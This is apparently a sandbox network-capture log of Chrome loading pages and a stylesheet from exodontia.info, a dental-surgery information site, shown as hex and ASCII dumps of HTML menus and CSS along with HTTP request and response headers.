                                                                                                                                      2024-04-24 10:14:25 UTC16384INData Raw: 52 45 56 49 74 48 67 63 38 71 44 49 62 53 54 4b 71 34 58 6b 52 69 55 61 36 7a 55 54 6a 67 2e 77 6f 66 66 32 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66 6f 6e 74 2f 77 6f 66 66 32 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 69 6d 70 6f 72 74 61 6e 63 65 3d 22 68 69 67 68 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6c 69 62 72 65 66 72 61 6e 6b 6c 69 6e 2f 76 31 34 2f 6a 69 7a 44 52 45 56 49 74 48 67 63 38 71 44 49 62 53 54 4b 71 34 58 6b 52 69 55 52 32 7a 63 4c 69 67 2e 77 6f 66 66 32 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66 6f 6e 74 2f 77 6f 66 66 32 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 69 6d 70 6f
                                                                                                                                      Data Ascii: REVItHgc8qDIbSTKq4XkRiUa6zUTjg.woff2" as="font" type="font/woff2" crossorigin importance="high"/><link rel="preload" href="https://fonts.gstatic.com/s/librefranklin/v14/jizDREVItHgc8qDIbSTKq4XkRiUR2zcLig.woff2" as="font" type="font/woff2" crossorigin impo
                                                                                                                                      2024-04-24 10:14:25 UTC16384INData Raw: 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 20 2b 3d 20 22 20 6a 73 22 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 74 79 6c 65 3e 2e 72 65 63 65 6e 74 63 6f 6d 6d 65 6e 74 73 20 61 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 70 61 64 64 69 6e 67 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6f 32 47 72 30 74 71 58 6e 34 73
                                                                                                                                      Data Ascii: /script><script type="text/javascript">document.documentElement.className += " js";</script><style>.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style><meta name="google-site-verification" content="Eo2Gr0tqXn4s
                                                                                                                                      2024-04-24 10:14:25 UTC16384INData Raw: 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 74 6f 70 3a 20 37 30 70 78 3b 0d 0a 7d 0d 0a 0d 0a 2e 74 62 5f 35 61 71 6f 34 37 31 20 70 20 7b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 64 61 72 6b 62 6c 75 65 29 3b 0d 0a 7d 0d 0a 0d 0a 23 70 61 67 65 77 72 61 70 20 61 2c 20 23 70 61 67 65 77 72 61 70 20 61 3a 68 6f 76 65 72 20 7b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 37 36 39 32 42 34 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 7d 0d 0a 0d 0a 23 70 61 67 65 77 72 61 70 20 2e 64 61 72 6b 62 6c 75 65 2d 62 67 20 61 20 7b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 7d 0d 0a 0d 0a 23 70 61 67 65 2d 33 37 38 20 2e 64 61 72 6b 62 6c 75 65 2d 62 67 20 7b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70
                                                                                                                                      Data Ascii: relative; top: 70px;}.tb_5aqo471 p { color: var(--darkblue);}#pagewrap a, #pagewrap a:hover { color: #7692B4!important;}#pagewrap .darkblue-bg a { color: white!important;}#page-378 .darkblue-bg { margin-top
                                                                                                                                      2024-04-24 10:14:25 UTC734INData Raw: 22 3e 4d 6f 75 74 68 2d 53 69 6e 75 73 20 48 6f 6c 65 73 20 28 4f 72 6f 2d 41 6e 74 72 61 6c 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 29 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 33 35 34 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 33 35 34 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 78 6f 64 6f 6e 74 69 61 2e 69 6e 66 6f 2f 63 6c 6f 73 75 72 65 2d 6f 66 2d 6d 6f 75 74 68 2d 73 69 6e 75 73 2d 68 6f 6c 65 73 2f 22 3e 43 6c 6f 73 75 72 65 20 6f 66 20 4d 6f 75 74 68 2d 53 69 6e 75 73 20 48 6f 6c 65 73 3c 2f 61 3e
                                                                                                                                      Data Ascii: ">Mouth-Sinus Holes (Oro-Antral Communications)</a></li><li id="menu-item-354" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-354"><a href="https://exodontia.info/closure-of-mouth-sinus-holes/">Closure of Mouth-Sinus Holes</a>
                                                                                                                                      2024-04-24 10:14:25 UTC1368INData Raw: 31 30 30 30 30 0d 0a 6e 74 69 61 2e 69 6e 66 6f 2f 62 75 63 63 61 6c 2d 66 61 74 2d 70 61 64 2d 72 65 70 61 69 72 2f 22 3e 42 75 63 63 61 6c 20 46 61 74 20 50 61 64 20 52 65 70 61 69 72 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 33 35 39 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 33 35 39 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 78 6f 64 6f 6e 74 69 61 2e 69 6e 66 6f 2f 61 6c 76 65 6f 70 6c 61 73 74 79 2f 22 3e 41 6c 76 65 6f 70 6c 61 73 74 79 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 69 64 3d 22 6d 65 6e 75
                                                                                                                                      Data Ascii: 10000ntia.info/buccal-fat-pad-repair/">Buccal Fat Pad Repair</a></li><li id="menu-item-359" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-359"><a href="https://exodontia.info/alveoplasty/">Alveoplasty</a></li><li id="menu
                                                                                                                                      2024-04-24 10:14:25 UTC14994INData Raw: 78 74 72 61 63 74 69 6f 6e 2f 22 3e 50 6f 73 74 2d 6f 70 20 42 69 6f 70 73 79 20 49 6e 73 74 72 75 63 74 69 6f 6e 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 33 36 38 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 33 36 38 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 78 6f 64 6f 6e 74 69 61 2e 69 6e 66 6f 2f 70 6f 73 74 2d 6f 70 2d 70 61 69 6e 2d 63 6f 6e 74 72 6f 6c 2f 22 3e 50 6f 73 74 2d 4f 70 20 50 61 69 6e 20 43 6f 6e 74 72 6f 6c 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 69 64
                                                                                                                                      Data Ascii: xtraction/">Post-op Biopsy Instructions</a></li><li id="menu-item-368" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-368"><a href="https://exodontia.info/post-op-pain-control/">Post-Op Pain Control</a></li></ul></li><li id
                                                                                                                                      2024-04-24 10:14:25 UTC16384INData Raw: 6f 63 61 74 69 6f 6e 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 32 32 36 33 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 32 32 36 33 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 78 6f 64 6f 6e 74 69 61 2e 69 6e 66 6f 2f 72 65 6d 65 64 69 61 6c 2d 6a 61 77 2d 65 78 65 72 63 69 73 65 73 2f 22 3e 52 65 6d 65 64 69 61 6c 20 4a 61 77 20 45 78 65 72 63 69 73 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 32 32 36 32 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65
                                                                                                                                      Data Ascii: ocation</a></li><li id="menu-item-2263" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2263"><a href="https://exodontia.info/remedial-jaw-exercises/">Remedial Jaw Exercises</a></li><li id="menu-item-2262" class="menu-item me
                                                                                                                                      2024-04-24 10:14:25 UTC16384INData Raw: 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 33 34 33 20 6d 65 6e 75 2d 70 61 67 65 2d 33 32 35 2d 70 61 72 65 6e 74 2d 33 39 34 22 20 3e 3c 61 20 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 78 6f 64 6f 6e 74 69 61 2e 69 6e 66 6f 2f 6f 70 65 72 63 75 6c 65 63 74 6f 6d 79 2f 22 3e 4f 70 65 72 63 75 6c 65 63 74 6f 6d 79 3c 2f 61 3e 20 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 70 61 67 65 2d 33 32 36 20 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20
                                                                                                                                      Data Ascii: u-item menu-item-type-post_type menu-item-object-page menu-item-343 menu-page-325-parent-394" ><a href="https://exodontia.info/operculectomy/">Operculectomy</a> </li><li class="menu-item-page-326 menu-item menu-item-type-post_type menu-item-object-page


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      142192.168.2.1649922153.92.6.1424437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:25 UTC826OUTGET /wp-content/uploads/themify-concate/826651810/themify-4036982551.css HTTP/1.1
                                                                                                                                      Host: exodontia.info
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                      Referer: https://exodontia.info/adverts-sponsors-policy/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: _gid=GA1.2.726087517.1713953648; _gat_gtag_UA_202665315_1=1; _ga=GA1.1.97673467.1713953648; _ga_XW48SKHQ61=GS1.1.1713953647.1.1.1713953663.0.0.0; _ga_BW7F70S0MZ=GS1.1.1713953648.1.1.1713953663.0.0.0
                                                                                                                                      2024-04-24 10:14:25 UTC584INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:14:25 GMT
                                                                                                                                      content-type: text/css
                                                                                                                                      last-modified: Tue, 09 Apr 2024 23:57:47 GMT
                                                                                                                                      etag: "31f5d-6615d5fb-dadecc482582d4b3;;;"
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 204637
                                                                                                                                      date: Wed, 24 Apr 2024 10:14:25 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      platform: hostinger
                                                                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:14:25 UTC16384INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 2f 2a 20 54 68 65 6d 69 66 79 20 53 68 6f 70 70 65 20 35 2e 37 2e 30 20 66 72 61 6d 65 77 6f 72 6b 20 35 2e 36 2e 34 20 2a 2f 0a 2f 2a 20 76 69 65 74 6e 61 6d 65 73 65 20 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 7b 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 4c 69 62 72 65 20 46 72 61 6e 6b 6c 69 6e 27 3b 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 69 74 61 6c 69 63 3b 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 20 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 73 77 61 70 3b 20 20 73 72 63 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6c 69 62 72 65 66 72 61 6e 6b 6c 69 6e 2f 76 31 34 2f 6a 69 7a 42 52 45 56 49 74 48 67 63 38 71 44 49 62 53 54 4b 71 34
                                                                                                                                      Data Ascii: @charset "UTF-8";/* Themify Shoppe 5.7.0 framework 5.6.4 *//* vietnamese */@font-face{ font-family:'Libre Franklin'; font-style:italic; font-weight:300; font-display:swap; src:url(https://fonts.gstatic.com/s/librefranklin/v14/jizBREVItHgc8qDIbSTKq4
                                                                                                                                      2024-04-24 10:14:25 UTC16384INData Raw: 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 4f 70 65 6e 20 53 61 6e 73 27 3b 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 69 74 61 6c 69 63 3b 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 20 20 66 6f 6e 74 2d 73 74 72 65 74 63 68 3a 31 30 30 25 3b 20 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 73 77 61 70 3b 20 20 73 72 63 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 34 30 2f 6d 65 6d 51 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 46 55 49 63 56 58 53 43 45 6b 78 32 63 6d 71 76 58 6c 57 71 38 74 57 5a 30 50 77 38 36 68 64 30 52 6b 38 5a 6b 57 56 34 65 77 4a 45 52 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e
                                                                                                                                      Data Ascii: font-family:'Open Sans'; font-style:italic; font-weight:400; font-stretch:100%; font-display:swap; src:url(https://fonts.gstatic.com/s/opensans/v40/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk8ZkWV4ewJER.woff2) format('woff2'); unicode-ran
                                                                                                                                      2024-04-24 10:14:26 UTC16384INData Raw: 6d 70 6f 72 74 61 6e 74 0a 7d 0a 2f 2a 20 69 4f 53 20 64 6f 65 73 6e 27 74 20 73 75 70 70 6f 72 74 20 66 69 78 65 64 20 61 74 74 61 63 68 6d 65 6e 74 20 2a 2f 0a 40 73 75 70 70 6f 72 74 73 20 28 2d 77 65 62 6b 69 74 2d 74 6f 75 63 68 2d 63 61 6c 6c 6f 75 74 3a 20 6e 6f 6e 65 29 20 7b 0a 09 2e 74 68 65 6d 69 66 79 5f 62 75 69 6c 64 65 72 5f 72 6f 77 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 61 74 74 61 63 68 6d 65 6e 74 3a 20 73 63 72 6f 6c 6c 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 7d 0a 7d 0a 2f 2a 43 4f 4c 55 4d 4e 20 41 4c 49 47 4e 4d 45 4e 54 2a 2f 0a 2f 2a 20 46 4c 45 58 20 42 4f 58 20 2a 2f 0a 2e 72 6f 77 5f 69 6e 6e 65 72 2c 0a 2e 6d 6f 64 75 6c 65 5f 63 6f 6c 75 6d 6e 2c 0a 2e 73 75 62 72 6f 77 5f 69 6e 6e 65 72 7b 0a 20 20 20 20 64 69 73 70 6c 61
                                                                                                                                      Data Ascii: mportant}/* iOS doesn't support fixed attachment */@supports (-webkit-touch-callout: none) {.themify_builder_row { background-attachment: scroll !important; }}/*COLUMN ALIGNMENT*//* FLEX BOX */.row_inner,.module_column,.subrow_inner{ displa
                                                                                                                                      2024-04-24 10:14:26 UTC16384INData Raw: 38 37 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 63 6f 6d 6d 65 6e 74 73 20 2e 63 6f 6d 6d 65 6e 74 2d 66 6f 72 6d 2d 61 75 74 68 6f 72 20 6c 61 62 65 6c 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 63 6f 6d 6d 65 6e 74 73 20 2e 63 6f 6d 6d 65 6e 74 2d 66 6f 72 6d 2d 63 6f 6d 6d 65 6e 74 20 6c 61 62 65 6c 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 63 6f 6d 6d 65 6e 74 73 20 2e 63 6f 6d 6d 65 6e 74 2d 66 6f 72 6d 2d 65 6d 61 69 6c 20 6c 61 62 65 6c 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 63 6f 6d 6d 65 6e 74 73 20 2e 63 6f 6d 6d 65 6e 74 2d 66 6f 72 6d 2d 75 72 6c 20 6c 61 62 65 6c 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 32 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74
                                                                                                                                      Data Ascii: 875em}.wp-block-post-comments .comment-form-author label,.wp-block-post-comments .comment-form-comment label,.wp-block-post-comments .comment-form-email label,.wp-block-post-comments .comment-form-url label{display:block;margin-bottom:.25em}.wp-block-post
                                                                                                                                      2024-04-24 10:14:26 UTC16384INData Raw: 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 65 6e 64 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 2e 68 61 73 2d 63 75 73 74 6f 6d 2d 63 6f 6e 74 65 6e 74 2d 70 6f 73 69 74 69 6f 6e 2e 68 61 73 2d 63 75 73 74 6f 6d 2d 63 6f 6e 74 65 6e 74 2d 70 6f 73 69 74 69 6f 6e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 5f 5f 69 6e 6e 65 72 2d 63 6f 6e 74 61 69 6e 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2e 68 61 73 2d 63 75 73 74 6f 6d 2d 63 6f 6e 74 65 6e 74 2d 70 6f 73 69 74 69 6f 6e 2e 68 61 73 2d 63 75 73 74 6f 6d 2d 63 6f 6e 74 65 6e 74 2d 70 6f 73 69 74 69 6f 6e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 5f 5f 69 6e 6e 65 72 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 7d 2e 77 70 2d 62 6c 6f 63
                                                                                                                                      Data Ascii: tify-content:flex-end}.wp-block-cover-image.has-custom-content-position.has-custom-content-position .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position .wp-block-cover__inner-container{margin:0}.wp-bloc
                                                                                                                                      2024-04-24 10:14:26 UTC16384INData Raw: 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 6d 61 67 65 3a 6e 74 68 2d 6f 66 2d 74 79 70 65 28 36 6e 29 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 2e 63 6f 6c 75 6d 6e 73 2d 36 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 74 65 6d 3a 6e 74 68 2d 6f 66 2d 74 79 70 65 28 36 6e 29 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 2e 63 6f 6c 75 6d 6e 73 2d 37 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 6d 61 67 65 3a 6e 74 68 2d 6f 66 2d 74 79 70 65 28 37 6e 29 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67
                                                                                                                                      Data Ascii: .blocks-gallery-image:nth-of-type(6n),.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-item:nth-of-type(6n),.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-image:nth-of-type(7n),.wp-block-gallery:not(.has-nested-imag
                                                                                                                                      2024-04-24 10:14:26 UTC16384INData Raw: 6d 6d 65 6e 74 2d 61 76 61 74 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 2e 35 65 6d 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 68 65 69 67 68 74 3a 32 2e 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 37 35 65 6d 3b 77 69 64 74 68 3a 32 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 61 74 65 73 74 2d 63 6f 6d 6d 65 6e 74 73 5b 63 6c 61 73 73 2a 3d 2d 66 6f 6e 74 2d 73 69 7a 65 5d 20 61 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 61 74 65 73 74 2d 63 6f 6d 6d 65 6e 74 73 5b 73 74 79 6c 65 2a 3d 66 6f 6e 74 2d 73 69 7a 65 5d 20 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 61 74 65 73 74 2d 70 6f 73 74 73 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62
                                                                                                                                      Data Ascii: mment-avatar{border-radius:1.5em;display:block;float:left;height:2.5em;margin-right:.75em;width:2.5em}.wp-block-latest-comments[class*=-font-size] a,.wp-block-latest-comments[style*=font-size] a{font-size:inherit}.wp-block-latest-posts{box-sizing:border-b
                                                                                                                                      2024-04-24 10:14:26 UTC16384INData Raw: 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 72 65 73 70 6f 6e 73 69 76 65 2d 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 73 75 62 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 7b 67 61 70 3a 69 6e 68 65 72 69 74 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 72 65 73 70 6f 6e 73 69 76 65 2d 63 6f 6e 74 61 69 6e 65 72 2e 69 73 2d 6d 65 6e 75 2d 6f 70 65 6e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 72 65 73 70 6f 6e 73 69 76 65 2d 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 73 75 62 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 7b 70 61 64 64
                                                                                                                                      Data Ascii: .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-container{gap:inherit}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-container{padd
                                                                                                                                      2024-04-24 10:14:26 UTC16384INData Raw: 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 7d 75 6c 2e 77 70 2d 62 6c 6f 63 6b 2d 72 73 73 2e 69 73 2d 67 72 69 64 20 6c 69 7b 6d 61 72 67 69 6e 3a 30 20 31 65 6d 20 31 65 6d 20 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 36 30 30 70 78 29 7b 75 6c 2e 77 70 2d 62 6c 6f 63 6b 2d 72 73 73 2e 63 6f 6c 75 6d 6e 73 2d 32 20 6c 69 7b 77 69 64 74 68 3a 63 61 6c 63 28 35 30 25 20 2d 20 31 65 6d 29 7d 75 6c 2e 77 70 2d 62 6c 6f 63 6b 2d 72 73 73 2e 63 6f 6c 75 6d 6e 73 2d 33 20 6c 69 7b 77 69 64 74 68 3a 63 61 6c 63 28 33 33 2e 33 33 33 33 33 25 20 2d 20 31 65 6d 29 7d 75 6c 2e 77 70 2d 62 6c 6f 63 6b 2d 72 73 73 2e 63 6f 6c 75 6d 6e 73 2d 34 20 6c 69 7b 77 69 64 74 68 3a 63 61 6c 63 28
                                                                                                                                      Data Ascii: ist-style:none;padding:0}ul.wp-block-rss.is-grid li{margin:0 1em 1em 0;width:100%}@media (min-width:600px){ul.wp-block-rss.columns-2 li{width:calc(50% - 1em)}ul.wp-block-rss.columns-3 li{width:calc(33.33333% - 1em)}ul.wp-block-rss.columns-4 li{width:calc(
